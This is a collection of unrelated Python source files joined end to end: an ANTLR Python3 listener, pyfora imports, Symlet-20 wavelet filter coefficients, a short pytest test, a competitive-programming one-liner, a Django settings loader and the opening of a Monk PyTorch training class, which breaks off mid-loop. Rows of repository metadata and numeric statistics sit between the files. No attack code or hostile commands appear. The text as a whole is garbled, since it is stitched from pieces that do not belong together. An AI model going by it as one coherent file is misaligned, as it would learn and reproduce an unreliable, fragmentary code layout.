def enterReturn_stmt(self, ctx: Python3Parser.Return_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#return_stmt.
def exitReturn_stmt(self, ctx: Python3Parser.Return_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#yield_stmt.
def enterYield_stmt(self, ctx: Python3Parser.Yield_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#yield_stmt.
def exitYield_stmt(self, ctx: Python3Parser.Yield_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#raise_stmt.
def enterRaise_stmt(self, ctx: Python3Parser.Raise_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#raise_stmt.
def exitRaise_stmt(self, ctx: Python3Parser.Raise_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#import_stmt.
def enterImport_stmt(self, ctx: Python3Parser.Import_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#import_stmt.
def exitImport_stmt(self, ctx: Python3Parser.Import_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#import_name.
def enterImport_name(self, ctx: Python3Parser.Import_nameContext):
pass
# Exit a parse tree produced by Python3Parser#import_name.
def exitImport_name(self, ctx: Python3Parser.Import_nameContext):
pass
# Enter a parse tree produced by Python3Parser#import_from.
def enterImport_from(self, ctx: Python3Parser.Import_fromContext):
pass
# Exit a parse tree produced by Python3Parser#import_from.
def exitImport_from(self, ctx: Python3Parser.Import_fromContext):
pass
# Enter a parse tree produced by Python3Parser#import_as_name.
def enterImport_as_name(self, ctx: Python3Parser.Import_as_nameContext):
pass
# Exit a parse tree produced by Python3Parser#import_as_name.
def exitImport_as_name(self, ctx: Python3Parser.Import_as_nameContext):
pass
# Enter a parse tree produced by Python3Parser#dotted_as_name.
def enterDotted_as_name(self, ctx: Python3Parser.Dotted_as_nameContext):
pass
# Exit a parse tree produced by Python3Parser#dotted_as_name.
def exitDotted_as_name(self, ctx: Python3Parser.Dotted_as_nameContext):
pass
# Enter a parse tree produced by Python3Parser#import_as_names.
def enterImport_as_names(self, ctx: Python3Parser.Import_as_namesContext):
pass
# Exit a parse tree produced by Python3Parser#import_as_names.
def exitImport_as_names(self, ctx: Python3Parser.Import_as_namesContext):
pass
# Enter a parse tree produced by Python3Parser#dotted_as_names.
def enterDotted_as_names(self, ctx: Python3Parser.Dotted_as_namesContext):
pass
# Exit a parse tree produced by Python3Parser#dotted_as_names.
def exitDotted_as_names(self, ctx: Python3Parser.Dotted_as_namesContext):
pass
# Enter a parse tree produced by Python3Parser#dotted_name.
def enterDotted_name(self, ctx: Python3Parser.Dotted_nameContext):
pass
# Exit a parse tree produced by Python3Parser#dotted_name.
def exitDotted_name(self, ctx: Python3Parser.Dotted_nameContext):
pass
# Enter a parse tree produced by Python3Parser#global_stmt.
def enterGlobal_stmt(self, ctx: Python3Parser.Global_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#global_stmt.
def exitGlobal_stmt(self, ctx: Python3Parser.Global_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#nonlocal_stmt.
def enterNonlocal_stmt(self, ctx: Python3Parser.Nonlocal_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#nonlocal_stmt.
def exitNonlocal_stmt(self, ctx: Python3Parser.Nonlocal_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#assert_stmt.
def enterAssert_stmt(self, ctx: Python3Parser.Assert_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#assert_stmt.
def exitAssert_stmt(self, ctx: Python3Parser.Assert_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#compound_stmt.
def enterCompound_stmt(self, ctx: Python3Parser.Compound_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#compound_stmt.
def exitCompound_stmt(self, ctx: Python3Parser.Compound_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#async_stmt.
def enterAsync_stmt(self, ctx: Python3Parser.Async_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#async_stmt.
def exitAsync_stmt(self, ctx: Python3Parser.Async_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#if_stmt.
def enterIf_stmt(self, ctx: Python3Parser.If_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#if_stmt.
def exitIf_stmt(self, ctx: Python3Parser.If_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#while_stmt.
def enterWhile_stmt(self, ctx: Python3Parser.While_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#while_stmt.
def exitWhile_stmt(self, ctx: Python3Parser.While_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#for_stmt.
def enterFor_stmt(self, ctx: Python3Parser.For_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#for_stmt.
def exitFor_stmt(self, ctx: Python3Parser.For_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#try_stmt.
def enterTry_stmt(self, ctx: Python3Parser.Try_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#try_stmt.
def exitTry_stmt(self, ctx: Python3Parser.Try_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#with_stmt.
def enterWith_stmt(self, ctx: Python3Parser.With_stmtContext):
pass
# Exit a parse tree produced by Python3Parser#with_stmt.
def exitWith_stmt(self, ctx: Python3Parser.With_stmtContext):
pass
# Enter a parse tree produced by Python3Parser#with_item.
def enterWith_item(self, ctx: Python3Parser.With_itemContext):
pass
# Exit a parse tree produced by Python3Parser#with_item.
def exitWith_item(self, ctx: Python3Parser.With_itemContext):
pass
# Enter a parse tree produced by Python3Parser#except_clause.
def enterExcept_clause(self, ctx: Python3Parser.Except_clauseContext):
pass
# Exit a parse tree produced by Python3Parser#except_clause.
def exitExcept_clause(self, ctx: Python3Parser.Except_clauseContext):
pass
# Enter a parse tree produced by Python3Parser#suite.
def enterSuite(self, ctx: Python3Parser.SuiteContext):
pass
# Exit a parse tree produced by Python3Parser#suite.
def exitSuite(self, ctx: Python3Parser.SuiteContext):
pass
# Enter a parse tree produced by Python3Parser#test.
def enterTest(self, ctx: Python3Parser.TestContext):
pass
# Exit a parse tree produced by Python3Parser#test.
def exitTest(self, ctx: Python3Parser.TestContext):
pass
# Enter a parse tree produced by Python3Parser#test_nocond.
def enterTest_nocond(self, ctx: Python3Parser.Test_nocondContext):
pass
# Exit a parse tree produced by Python3Parser#test_nocond.
def exitTest_nocond(self, ctx: Python3Parser.Test_nocondContext):
pass
# Enter a parse tree produced by Python3Parser#lambdef.
def enterLambdef(self, ctx: Python3Parser.LambdefContext):
pass
# Exit a parse tree produced by Python3Parser#lambdef.
def exitLambdef(self, ctx: Python3Parser.LambdefContext):
pass
# Enter a parse tree produced by Python3Parser#lambdef_nocond.
def enterLambdef_nocond(self, ctx: Python3Parser.Lambdef_nocondContext):
pass
# Exit a parse tree produced by Python3Parser#lambdef_nocond.
def exitLambdef_nocond(self, ctx: Python3Parser.Lambdef_nocondContext):
pass
# Enter a parse tree produced by Python3Parser#or_test.
def enterOr_test(self, ctx: Python3Parser.Or_testContext):
pass
# Exit a parse tree produced by Python3Parser#or_test.
def exitOr_test(self, ctx: Python3Parser.Or_testContext):
pass
# Enter a parse tree produced by Python3Parser#and_test.
def enterAnd_test(self, ctx: Python3Parser.And_testContext):
pass
# Exit a parse tree produced by Python3Parser#and_test.
def exitAnd_test(self, ctx: Python3Parser.And_testContext):
pass
# Enter a parse tree produced by Python3Parser#not_test.
def enterNot_test(self, ctx: Python3Parser.Not_testContext):
pass
# Exit a parse tree produced by Python3Parser#not_test.
def exitNot_test(self, ctx: Python3Parser.Not_testContext):
pass
# Enter a parse tree produced by Python3Parser#comparison.
def enterComparison(self, ctx: Python3Parser.ComparisonContext):
pass
# Exit a parse tree produced by Python3Parser#comparison.
def exitComparison(self, ctx: Python3Parser.ComparisonContext):
pass
# Enter a parse tree produced by Python3Parser#comp_op.
def enterComp_op(self, ctx: Python3Parser.Comp_opContext):
pass
# Exit a parse tree produced by Python3Parser#comp_op.
def exitComp_op(self, ctx: Python3Parser.Comp_opContext):
pass
# Enter a parse tree produced by Python3Parser#star_expr.
def enterStar_expr(self, ctx: Python3Parser.Star_exprContext):
pass
# Exit a parse tree produced by Python3Parser#star_expr.
def exitStar_expr(self, ctx: Python3Parser.Star_exprContext):
pass
# Enter a parse tree produced by Python3Parser#expr.
def enterExpr(self, ctx: Python3Parser.ExprContext):
pass
# Exit a parse tree produced by Python3Parser#expr.
def exitExpr(self, ctx: Python3Parser.ExprContext):
pass
# Enter a parse tree produced by Python3Parser#xor_expr.
def enterXor_expr(self, ctx: Python3Parser.Xor_exprContext):
pass
# Exit a parse tree produced by Python3Parser#xor_expr.
def exitXor_expr(self, ctx: Python3Parser.Xor_exprContext):
pass
# Enter a parse tree produced by Python3Parser#and_expr.
def enterAnd_expr(self, ctx: Python3Parser.And_exprContext):
pass
# Exit a parse tree produced by Python3Parser#and_expr.
def exitAnd_expr(self, ctx: Python3Parser.And_exprContext):
pass
# Enter a parse tree produced by Python3Parser#shift_expr.
def enterShift_expr(self, ctx: Python3Parser.Shift_exprContext):
pass
# Exit a parse tree produced by Python3Parser#shift_expr.
def exitShift_expr(self, ctx: Python3Parser.Shift_exprContext):
pass
# Enter a parse tree produced by Python3Parser#arith_expr.
def enterArith_expr(self, ctx: Python3Parser.Arith_exprContext):
pass
# Exit a parse tree produced by Python3Parser#arith_expr.
def exitArith_expr(self, ctx: Python3Parser.Arith_exprContext):
pass
# Enter a parse tree produced by Python3Parser#term.
def enterTerm(self, ctx: Python3Parser.TermContext):
print(ctx.getText())
# Exit a parse tree produced by Python3Parser#term.
def exitTerm(self, ctx: Python3Parser.TermContext):
pass
# Enter a parse tree produced by Python3Parser#factor.
def enterFactor(self, ctx: Python3Parser.FactorContext):
pass
# Exit a parse tree produced by Python3Parser#factor.
def exitFactor(self, ctx: Python3Parser.FactorContext):
pass
# Enter a parse tree produced by Python3Parser#power.
def enterPower(self, ctx: Python3Parser.PowerContext):
print(ctx.getText())
# Exit a parse tree produced by Python3Parser#power.
def exitPower(self, ctx: Python3Parser.PowerContext):
pass
# Enter a parse tree produced by Python3Parser#atom_expr.
def enterAtom_expr(self, ctx: Python3Parser.Atom_exprContext):
pass
# Exit a parse tree produced by Python3Parser#atom_expr.
def exitAtom_expr(self, ctx: Python3Parser.Atom_exprContext):
pass
# Enter a parse tree produced by Python3Parser#atom.
def enterAtom(self, ctx: Python3Parser.AtomContext):
pass
# Exit a parse tree produced by Python3Parser#atom.
def exitAtom(self, ctx: Python3Parser.AtomContext):
pass
# Enter a parse tree produced by Python3Parser#testlist_comp.
def enterTestlist_comp(self, ctx: Python3Parser.Testlist_compContext):
pass
# Exit a parse tree produced by Python3Parser#testlist_comp.
def exitTestlist_comp(self, ctx: Python3Parser.Testlist_compContext):
pass
# Enter a parse tree produced by Python3Parser#trailer.
def enterTrailer(self, ctx: Python3Parser.TrailerContext):
pass
# Exit a parse tree produced by Python3Parser#trailer.
def exitTrailer(self, ctx: Python3Parser.TrailerContext):
pass
# Enter a parse tree produced by Python3Parser#subscriptlist.
def enterSubscriptlist(self, ctx: Python3Parser.SubscriptlistContext):
pass
# Exit a parse tree produced by Python3Parser#subscriptlist.
def exitSubscriptlist(self, ctx: Python3Parser.SubscriptlistContext):
pass
# Enter a parse tree produced by Python3Parser#subscript.
def enterSubscript(self, ctx: Python3Parser.SubscriptContext):
pass
# Exit a parse tree produced by Python3Parser#subscript.
def exitSubscript(self, ctx: Python3Parser.SubscriptContext):
pass
# Enter a parse tree produced by Python3Parser#sliceop.
def enterSliceop(self, ctx: Python3Parser.SliceopContext):
pass
# Exit a parse tree produced by Python3Parser#sliceop.
def exitSliceop(self, ctx: Python3Parser.SliceopContext):
pass
# Enter a parse tree produced by Python3Parser#exprlist.
def enterExprlist(self, ctx: Python3Parser.ExprlistContext):
pass
# Exit a parse tree produced by Python3Parser#exprlist.
def exitExprlist(self, ctx: Python3Parser.ExprlistContext):
pass
# Enter a parse tree produced by Python3Parser#testlist.
def enterTestlist(self, ctx: Python3Parser.TestlistContext):
pass
# Exit a parse tree produced by Python3Parser#testlist.
def exitTestlist(self, ctx: Python3Parser.TestlistContext):
pass
# Enter a parse tree produced by Python3Parser#dictorsetmaker.
def enterDictorsetmaker(self, ctx: Python3Parser.DictorsetmakerContext):
pass
# Exit a parse tree produced by Python3Parser#dictorsetmaker.
def exitDictorsetmaker(self, ctx: Python3Parser.DictorsetmakerContext):
pass
# Enter a parse tree produced by Python3Parser#classdef.
def enterClassdef(self, ctx: Python3Parser.ClassdefContext):
pass
# Exit a parse tree produced by Python3Parser#classdef.
def exitClassdef(self, ctx: Python3Parser.ClassdefContext):
pass
# Enter a parse tree produced by Python3Parser#arglist.
def enterArglist(self, ctx: Python3Parser.ArglistContext):
pass
# Exit a parse tree produced by Python3Parser#arglist.
def exitArglist(self, ctx: Python3Parser.ArglistContext):
pass
# Enter a parse tree produced by Python3Parser#argument.
def enterArgument(self, ctx: Python3Parser.ArgumentContext):
pass
# Exit a parse tree produced by Python3Parser#argument.
def exitArgument(self, ctx: Python3Parser.ArgumentContext):
pass
# Enter a parse tree produced by Python3Parser#comp_iter.
def enterComp_iter(self, ctx: Python3Parser.Comp_iterContext):
pass
# Exit a parse tree produced by Python3Parser#comp_iter.
def exitComp_iter(self, ctx: Python3Parser.Comp_iterContext):
pass
# Enter a parse tree produced by Python3Parser#comp_for.
def enterComp_for(self, ctx: Python3Parser.Comp_forContext):
pass
# Exit a parse tree produced by Python3Parser#comp_for.
def exitComp_for(self, ctx: Python3Parser.Comp_forContext):
pass
# Enter a parse tree produced by Python3Parser#comp_if.
def enterComp_if(self, ctx: Python3Parser.Comp_ifContext):
pass
# Exit a parse tree produced by Python3Parser#comp_if.
def exitComp_if(self, ctx: Python3Parser.Comp_ifContext):
pass
# Enter a parse tree produced by Python3Parser#encoding_decl.
def enterEncoding_decl(self, ctx: Python3Parser.Encoding_declContext):
pass
# Exit a parse tree produced by Python3Parser#encoding_decl.
def exitEncoding_decl(self, ctx: Python3Parser.Encoding_declContext):
pass
# Enter a parse tree produced by Python3Parser#yield_expr.
def enterYield_expr(self, ctx: Python3Parser.Yield_exprContext):
pass
# Exit a parse tree produced by Python3Parser#yield_expr.
def exitYield_expr(self, ctx: Python3Parser.Yield_exprContext):
pass
# Enter a parse tree produced by Python3Parser#yield_arg.
def enterYield_arg(self, ctx: Python3Parser.Yield_argContext):
pass
# Exit a parse tree produced by Python3Parser#yield_arg.
def exitYield_arg(self, ctx: Python3Parser.Yield_argContext):
pass
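# Usage sketch (an assumption, not part of this file: the antlr4 Python runtime
# and a generated AntlrGrammar.Python3Lexer are available alongside this
# listener, as in the standard ANTLR Python target layout). A walker fires the
# enter*/exit* callbacks above while traversing the parse tree:
#
#     from antlr4 import CommonTokenStream, InputStream, ParseTreeWalker
#     from AntlrGrammar.Python3Lexer import Python3Lexer
#
#     lexer = Python3Lexer(InputStream("a = b * 2\n"))
#     parser = Python3Parser(CommonTokenStream(lexer))
#     tree = parser.file_input()
#     ParseTreeWalker.DEFAULT.walk(Python3WalkListener(), tree)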
# Source: packages/python/pyfora/algorithms/__init__.py (ufora/ufora, Apache-2.0)
from pyfora.algorithms.LinearRegression import linearRegression
from pyfora.algorithms.logistic.BinaryLogisticRegressionFitter import BinaryLogisticRegressionFitter
from pyfora.algorithms.regressionTrees.RegressionTree import RegressionTreeBuilder
from pyfora.algorithms.regressionTrees.GradientBoostedClassifierBuilder import GradientBoostedClassifierBuilder
from pyfora.algorithms.regressionTrees.GradientBoostedRegressorBuilder import GradientBoostedRegressorBuilder
| 78.333333 | 111 | 0.92766 | 34 | 470 | 12.823529 | 0.352941 | 0.114679 | 0.229358 | 0.240826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042553 | 470 | 5 | 112 | 94 | 0.968889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
# Source: torpido/wavelet/wavelets/sym20.py (AP-Atul/Torpido, Unlicense)
""" Symlet 20 wavelet """
class Symlet20:
"""
Properties
----------
near symmetric, orthogonal, biorthogonal
All values are from http://wavelets.pybytes.com/wavelet/sym20/
"""
__name__ = "Symlet Wavelet 20"
__motherWaveletLength__ = 40 # length of the mother wavelet
    __transformWaveletLength__ = 2  # minimum length of the input signal for the transform
# decomposition filter
# low-pass
decompositionLowFilter = [
3.695537474835221e-07,
-1.9015675890554106e-07,
-7.919361411976999e-06,
3.025666062736966e-06,
7.992967835772481e-05,
-1.928412300645204e-05,
-0.0004947310915672655,
7.215991188074035e-05,
0.002088994708190198,
-0.0003052628317957281,
-0.006606585799088861,
0.0014230873594621453,
0.01700404902339034,
-0.003313857383623359,
-0.031629437144957966,
0.008123228356009682,
0.025579349509413946,
-0.07899434492839816,
-0.02981936888033373,
0.4058314443484506,
0.75116272842273,
0.47199147510148703,
-0.0510883429210674,
-0.16057829841525254,
0.03625095165393308,
0.08891966802819956,
-0.0068437019650692274,
-0.035373336756604236,
0.0019385970672402002,
0.012157040948785737,
-0.0006111263857992088,
-0.0034716478028440734,
0.0001254409172306726,
0.0007476108597820572,
-2.6615550335516086e-05,
-0.00011739133516291466,
4.525422209151636e-06,
1.22872527779612e-05,
-3.2567026420174407e-07,
-6.329129044776395e-07,
]
# high-pass
decompositionHighFilter = [
6.329129044776395e-07,
-3.2567026420174407e-07,
-1.22872527779612e-05,
4.525422209151636e-06,
0.00011739133516291466,
-2.6615550335516086e-05,
-0.0007476108597820572,
0.0001254409172306726,
0.0034716478028440734,
-0.0006111263857992088,
-0.012157040948785737,
0.0019385970672402002,
0.035373336756604236,
-0.0068437019650692274,
-0.08891966802819956,
0.03625095165393308,
0.16057829841525254,
-0.0510883429210674,
-0.47199147510148703,
0.75116272842273,
-0.4058314443484506,
-0.02981936888033373,
0.07899434492839816,
0.025579349509413946,
-0.008123228356009682,
-0.031629437144957966,
0.003313857383623359,
0.01700404902339034,
-0.0014230873594621453,
-0.006606585799088861,
0.0003052628317957281,
0.002088994708190198,
-7.215991188074035e-05,
-0.0004947310915672655,
1.928412300645204e-05,
7.992967835772481e-05,
-3.025666062736966e-06,
-7.919361411976999e-06,
1.9015675890554106e-07,
3.695537474835221e-07,
]
# reconstruction filters
# low pass
reconstructionLowFilter = [
-6.329129044776395e-07,
-3.2567026420174407e-07,
1.22872527779612e-05,
4.525422209151636e-06,
-0.00011739133516291466,
-2.6615550335516086e-05,
0.0007476108597820572,
0.0001254409172306726,
-0.0034716478028440734,
-0.0006111263857992088,
0.012157040948785737,
0.0019385970672402002,
-0.035373336756604236,
-0.0068437019650692274,
0.08891966802819956,
0.03625095165393308,
-0.16057829841525254,
-0.0510883429210674,
0.47199147510148703,
0.75116272842273,
0.4058314443484506,
-0.02981936888033373,
-0.07899434492839816,
0.025579349509413946,
0.008123228356009682,
-0.031629437144957966,
-0.003313857383623359,
0.01700404902339034,
0.0014230873594621453,
-0.006606585799088861,
-0.0003052628317957281,
0.002088994708190198,
7.215991188074035e-05,
-0.0004947310915672655,
-1.928412300645204e-05,
7.992967835772481e-05,
3.025666062736966e-06,
-7.919361411976999e-06,
-1.9015675890554106e-07,
3.695537474835221e-07,
]
# high-pass
reconstructionHighFilter = [
3.695537474835221e-07,
1.9015675890554106e-07,
-7.919361411976999e-06,
-3.025666062736966e-06,
7.992967835772481e-05,
1.928412300645204e-05,
-0.0004947310915672655,
-7.215991188074035e-05,
0.002088994708190198,
0.0003052628317957281,
-0.006606585799088861,
-0.0014230873594621453,
0.01700404902339034,
0.003313857383623359,
-0.031629437144957966,
-0.008123228356009682,
0.025579349509413946,
0.07899434492839816,
-0.02981936888033373,
-0.4058314443484506,
0.75116272842273,
-0.47199147510148703,
-0.0510883429210674,
0.16057829841525254,
0.03625095165393308,
-0.08891966802819956,
-0.0068437019650692274,
0.035373336756604236,
0.0019385970672402002,
-0.012157040948785737,
-0.0006111263857992088,
0.0034716478028440734,
0.0001254409172306726,
-0.0007476108597820572,
-2.6615550335516086e-05,
0.00011739133516291466,
4.525422209151636e-06,
-1.22872527779612e-05,
-3.2567026420174407e-07,
6.329129044776395e-07,
]
| 28.865285 | 72 | 0.61856 | 422 | 5,571 | 8.137441 | 0.218009 | 0.008736 | 0.022132 | 0.023296 | 0.882935 | 0.882935 | 0.882935 | 0.882935 | 0.882935 | 0.882935 | 0 | 0.757269 | 0.290074 | 5,571 | 192 | 73 | 29.015625 | 0.110999 | 0.052594 | 0 | 0.930233 | 0 | 0 | 0.003246 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.046512 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
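The four Symlet-20 filter banks above are not independent: for an orthogonal wavelet, the high-pass decomposition filter is the quadrature mirror of the low-pass one (reverse the taps and alternate signs, matching the sign pattern visible in the sym20 table), and the two reconstruction filters are time-reversed copies of the decomposition filters. A minimal sketch of those relations, using the short Daubechies-2 filter so the coefficients fit inline (the relations are the same for the 40-tap sym20):

```python
import math

# Daubechies-2 low-pass decomposition filter (closed-form coefficients).
s = math.sqrt(3)
dec_lo = [(1 + s) / (4 * math.sqrt(2)), (3 + s) / (4 * math.sqrt(2)),
          (3 - s) / (4 * math.sqrt(2)), (1 - s) / (4 * math.sqrt(2))]

n = len(dec_lo)
# Quadrature mirror: reverse the low-pass taps and alternate signs
# (the same pattern relating decompositionLowFilter to decompositionHighFilter above).
dec_hi = [(-1) ** (k + 1) * dec_lo[n - 1 - k] for k in range(n)]
# Reconstruction filters are the time-reversed decomposition filters.
rec_lo = dec_lo[::-1]
rec_hi = dec_hi[::-1]

# Orthonormality checks: unit energy and low/high orthogonality.
assert abs(sum(c * c for c in dec_lo) - 1.0) < 1e-12
assert abs(sum(a * b for a, b in zip(dec_lo, dec_hi))) < 1e-12
```

Sign conventions for the high-pass filter vary between libraries; the `(-1) ** (k + 1)` choice here follows the sym20 coefficient table above, and orthogonality holds either way.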
294d600035c0b7e0a403c89fced01ecf61aa007a | 40 | py | Python | exampleproject/tests/test_non_utf_crash.py | pjdelport/pytest-testmon | dbbaf2f29cc7e9a2745f27dae91e44ce973e8d10 | [
"MIT"
] | null | null | null | exampleproject/tests/test_non_utf_crash.py | pjdelport/pytest-testmon | dbbaf2f29cc7e9a2745f27dae91e44ce973e8d10 | [
"MIT"
] | null | null | null | exampleproject/tests/test_non_utf_crash.py | pjdelport/pytest-testmon | dbbaf2f29cc7e9a2745f27dae91e44ce973e8d10 | [
"MIT"
] | null | null | null | def test_basic():
import print1250r
| 13.333333 | 21 | 0.725 | 5 | 40 | 5.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 0.2 | 40 | 2 | 22 | 20 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0.5 | 0 | 1 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 8 |
2959e4d34d8c4e6f04454c48f10372abc485be57 | 81 | py | Python | jp.atcoder/arc025/arc025_1/30797423.py | kagemeka/atcoder-submissions | 91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e | [
"MIT"
] | 1 | 2022-02-09T03:06:25.000Z | 2022-02-09T03:06:25.000Z | jp.atcoder/arc025/arc025_1/30797423.py | kagemeka/atcoder-submissions | 91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e | [
"MIT"
] | 1 | 2022-02-05T22:53:18.000Z | 2022-02-09T01:29:30.000Z | jp.atcoder/arc025/arc025_1/30797423.py | kagemeka/atcoder-submissions | 91d8ad37411ea2ec582b10ba41b1e3cae01d4d6e | [
"MIT"
] | null | null | null | print(sum(map(max, zip(map(int, input().split()), map(int, input().split())))))
| 40.5 | 80 | 0.604938 | 13 | 81 | 3.769231 | 0.615385 | 0.244898 | 0.44898 | 0.653061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 81 | 1 | 81 | 81 | 0.653333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
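The golfed one-liner above reads two lines of space-separated integers and prints the sum of the element-wise maxima. An unrolled equivalent for readability (the function name is illustrative, not part of the submission):

```python
def sum_of_pairwise_max(a, b):
    # For each position, keep the larger of the two values, then total them.
    return sum(max(x, y) for x, y in zip(a, b))

# The submission is equivalent to:
# print(sum_of_pairwise_max(map(int, input().split()), map(int, input().split())))
```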
462f199e4a0175111862d8348ab0d24d8cf498f1 | 85 | py | Python | ausgsteckt/ausgsteckt/settings/__init__.py | kelvan/ausgsteckt | 8a1063ff065cdb167648e75f1cdbdc6fce897992 | [
"MIT"
] | 2 | 2018-01-30T15:59:21.000Z | 2018-07-25T04:56:40.000Z | ausgsteckt/ausgsteckt/settings/__init__.py | kelvan/ausgsteckt | 8a1063ff065cdb167648e75f1cdbdc6fce897992 | [
"MIT"
] | null | null | null | ausgsteckt/ausgsteckt/settings/__init__.py | kelvan/ausgsteckt | 8a1063ff065cdb167648e75f1cdbdc6fce897992 | [
"MIT"
] | null | null | null | from ._servers import get_server_type
exec("from .%s import *" % get_server_type())
| 21.25 | 45 | 0.741176 | 13 | 85 | 4.461538 | 0.615385 | 0.310345 | 0.517241 | 0.655172 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129412 | 85 | 3 | 46 | 28.333333 | 0.783784 | 0 | 0 | 0 | 0 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
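The `exec`-based star import above can be expressed without `exec` via `importlib`; a sketch of that alternative (the helper name and the `__all__` fallback are assumptions, not part of the project):

```python
import importlib

def load_settings(module_name, namespace):
    # Import the module and copy its public names into the target namespace,
    # emulating "from <module> import *" without building a code string.
    mod = importlib.import_module(module_name)
    public = getattr(mod, "__all__",
                     [n for n in dir(mod) if not n.startswith("_")])
    namespace.update({name: getattr(mod, name) for name in public})
```

For a relative module like the one selected by `get_server_type()`, the call would presumably be `importlib.import_module("." + get_server_type(), package=__package__)`, passing `globals()` as the namespace.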
3114da02a1f3d2d2a4552d7a96cd384ecc849d89 | 34,843 | py | Python | monk/pytorch/finetune/level_3_training_base.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 542 | 2019-11-10T12:09:31.000Z | 2022-03-28T11:39:07.000Z | monk/pytorch/finetune/level_3_training_base.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 117 | 2019-11-12T09:39:24.000Z | 2022-03-12T00:20:41.000Z | monk/pytorch/finetune/level_3_training_base.py | take2rohit/monk_v1 | 9c567bf2c8b571021b120d879ba9edf7751b9f92 | [
"Apache-2.0"
] | 246 | 2019-11-09T21:53:24.000Z | 2022-03-29T00:57:07.000Z | from monk.pytorch.finetune.imports import *
from monk.system.imports import *
from monk.pytorch.finetune.level_2_model_base import finetune_model
class finetune_training(finetune_model):
'''
Base class for training and associated functions
Args:
verbose (int): Set verbosity levels
0 - Print Nothing
1 - Print desired details
'''
@accepts("self", verbose=int, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def __init__(self, verbose=1):
super().__init__(verbose=verbose);
###############################################################################################################################################
@accepts("self", post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def get_training_estimate(self):
'''
Get estimated time for training a single epoch based on all set parameters
Args:
None
Returns:
float: Total time per epoch in seconds
'''
total_time_per_epoch = 0;
self.system_dict = load_optimizer(self.system_dict);
self.system_dict = load_scheduler(self.system_dict);
self.system_dict = load_loss(self.system_dict);
since = time.time();
for phase in ['train', 'val']:
if phase == 'train':
self.system_dict["local"]["model"].train()
else:
self.system_dict["local"]["model"].eval()
running_loss = 0.0
running_corrects = 0
required_iters = len(self.system_dict["local"]["data_loaders"][phase])//10;
current_iter = 0;
for inputs, labels in self.system_dict["local"]["data_loaders"][phase]:
inputs = inputs.to(self.system_dict["local"]["device"]);
labels = labels.to(self.system_dict["local"]["device"]);
